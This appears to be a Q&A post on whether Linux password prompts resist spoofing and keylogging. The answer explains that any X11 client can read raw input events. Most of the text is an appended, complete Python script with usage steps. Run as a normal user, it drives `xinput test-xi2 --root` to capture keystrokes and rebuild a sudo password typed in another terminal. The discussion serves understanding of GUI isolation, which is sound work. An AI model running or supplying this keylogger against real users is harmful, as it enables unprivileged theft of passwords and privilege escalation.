Security model of Linux password entry

Tags: gui, password, security, user interface

Whenever a Windows application wants to do something requiring administrator privileges, my screen goes black and a prompt comes up, asking if I want to grant administrator privileges. I understand this security model: it relies on the user having control over the keyboard and mouse. Privileges go to whoever has control of input. If an application gains control of input while the security prompt is up, then it gains control of administrator privileges, even if it doesn't know my password.

In contrast, on Linux, the sudo command is the equivalent. When an application requests privileges, it prompts me to enter my password. Thus, stealing input is insufficient to gain full privileges; an application must steal my password instead. However, I do not understand this model. It seems that this model just makes it easy to steal my credentials, because I am giving out my password constantly. What's stopping a malicious application from putting up a fake prompt and stealing my password, thus gaining privileges forever?

  1. Is a security prompt bound in some way to the application that requests it?
  2. If an application is able to impersonate a security prompt, or raise a security prompt while pretending to be another application, then is it assumed that the application already has full control of the computer and cannot raise its privileges by learning my password?
  3. If I trust an application once, then is it ok for that application to steal my password?
  4. Does Linux (theoretically) prevent non-root keyloggers, or can a non-root keylogger sniff my password even when I'm typing it into a legitimate security prompt?

I do not understand what stops a malicious unprivileged program from wrenching privileges from an administrator account. The security model could simply be that all programs run by an administrator are assumed to have access to root if they wish for it, and that administrators cannot rely on root/non-root being a meaningful barrier. Windows runs under this premise in practice. I can't tell if Linux tries to make any additional guarantees.

Best Answer

I read that Wayland brings the infrastructure to prohibit it, but for now it's still a problem.

Just see

xinput test-xi2

The first article I read about the problem:

http://theinvisiblethings.blogspot.de/2011/04/linux-security-circus-on-gui-isolation.html

Further and deeper discussion:

http://lwn.net/Articles/517375/
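What the answer's `xinput test-xi2` shows, worked out as an added example (my code, not part of the original answer): an ordinary user drives that same tool, subscribes to XInput2 raw events on the root window, and reconstructs the text typed into a `sudo` prompt in a different terminal. It assumes the unshifted US keymap (X keycode = evdev code + 8), that `xinput test-xi2 --root` prints events in the block format reproduced in the comments, and that `XDG_SESSION_TYPE`/`WAYLAND_DISPLAY` identify a Wayland session; the `fake_xinput_output` helper is constructed sample data for running the parser offline.

```python
#!/usr/bin/env python3
"""Non-root keystroke capture on X11 via `xinput test-xi2`.

An unprivileged X11 client that subscribes to XInput2 raw events sees
every keystroke on the seat, including a password typed into a sudo
prompt in another terminal.  Usage, as a normal user on an X11 session:
    terminal 1:  python3 xi2_capture.py
    terminal 2:  sudo -v        # type the password here
Terminal 1 prints the line once Enter is pressed.
"""
import os
import re
import subprocess
import sys

# X keycode = evdev keycode + 8.  The table is the unshifted US layout
# for letters, digits and space: an assumption about the keymap, not
# something read from the X server (XkbKeycodeToKeysym would be exact).
EVDEV_OFFSET = 8
_EVDEV_UNSHIFTED = {57: " "}
_EVDEV_UNSHIFTED.update({2 + i: c for i, c in enumerate("1234567890")})
_EVDEV_UNSHIFTED.update({16 + i: c for i, c in enumerate("qwertyuiop")})
_EVDEV_UNSHIFTED.update({30 + i: c for i, c in enumerate("asdfghjkl")})
_EVDEV_UNSHIFTED.update({44 + i: c for i, c in enumerate("zxcvbnm")})
KEYCODE_TO_CHAR = {k + EVDEV_OFFSET: v for k, v in _EVDEV_UNSHIFTED.items()}
KEYCODE_ENTER = 28 + EVDEV_OFFSET      # 36
KEYCODE_BACKSPACE = 14 + EVDEV_OFFSET  # 22

# `xinput test-xi2` prints one block per event (format assumed here):
#   EVENT type 13 (RawKeyPress)
#       device: 3 (3)
#       detail: 38
#       valuators:
# Only RawKeyPress blocks matter; "detail" carries the keycode.
_EVENT_RE = re.compile(r"^EVENT type \d+ \((\w+)\)")
_DETAIL_RE = re.compile(r"^\s+detail: (\d+)")


def iter_raw_key_presses(lines):
    """Yield the keycode of every RawKeyPress event in xinput's output."""
    in_key_press = False
    for line in lines:
        m = _EVENT_RE.match(line)
        if m:
            in_key_press = m.group(1) == "RawKeyPress"
            continue
        m = _DETAIL_RE.match(line)
        if m and in_key_press:
            yield int(m.group(1))
            in_key_press = False  # one detail line per event block


def parse_raw_key_presses(text):
    return list(iter_raw_key_presses(text.splitlines()))


class LineBuffer:
    """Turn a keycode stream into the lines a line-oriented prompt sees."""

    def __init__(self):
        self.chars = []

    def feed(self, keycode):
        """Return the completed line when Enter arrives, else None."""
        if keycode == KEYCODE_ENTER:
            line = "".join(self.chars)
            self.chars = []
            return line
        if keycode == KEYCODE_BACKSPACE:
            if self.chars:
                self.chars.pop()
            return None
        # Unmapped keys (shift, symbols, ...) are kept as <keycode>
        # so nothing is silently dropped.
        self.chars.append(KEYCODE_TO_CHAR.get(keycode, f"<{keycode}>"))
        return None


def reconstruct_lines(keycodes):
    buf, lines = LineBuffer(), []
    for kc in keycodes:
        line = buf.feed(kc)
        if line is not None:
            lines.append(line)
    return lines


def session_type(environ):
    """Classify the desktop session; the raw-event trick only works on X11."""
    if environ.get("XDG_SESSION_TYPE") == "wayland" or environ.get("WAYLAND_DISPLAY"):
        return "wayland"
    if environ.get("DISPLAY"):
        return "x11"
    return "none"


def fake_xinput_output(keycodes):
    """Constructed sample in xinput's block format, for offline testing."""
    blocks = []
    for kc in keycodes:
        for ev_type, name in ((13, "RawKeyPress"), (14, "RawKeyRelease")):
            blocks.append(f"EVENT type {ev_type} ({name})\n    device: 3 (3)\n"
                          f"    detail: {kc}\n    valuators:\n")
    return "".join(blocks)


def main():
    kind = session_type(os.environ)
    if kind != "x11":
        # Under Wayland the compositor does not hand other clients' input
        # to us; refuse rather than report a misleading empty capture.
        print(f"session type is {kind!r}; raw XI2 events only leak on X11",
              file=sys.stderr)
        return 1
    # --root: raw events are delivered on the root window only.
    proc = subprocess.Popen(["xinput", "test-xi2", "--root"],
                            stdout=subprocess.PIPE, text=True)
    buf = LineBuffer()
    for kc in iter_raw_key_presses(proc.stdout):
        line = buf.feed(kc)
        if line is not None:
            print(f"captured line: {line!r}")
    return proc.wait()


if __name__ == "__main__":
    sys.exit(main())
```

Nothing here needs root, a ptrace of the terminal, or the password-prompt process: the X server hands the events to any client that asks, which is the "GUI isolation" problem the linked articles describe. The `session_type` check is the practical test a practitioner wants: if it reports `wayland`, the same script sees nothing typed into other clients.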
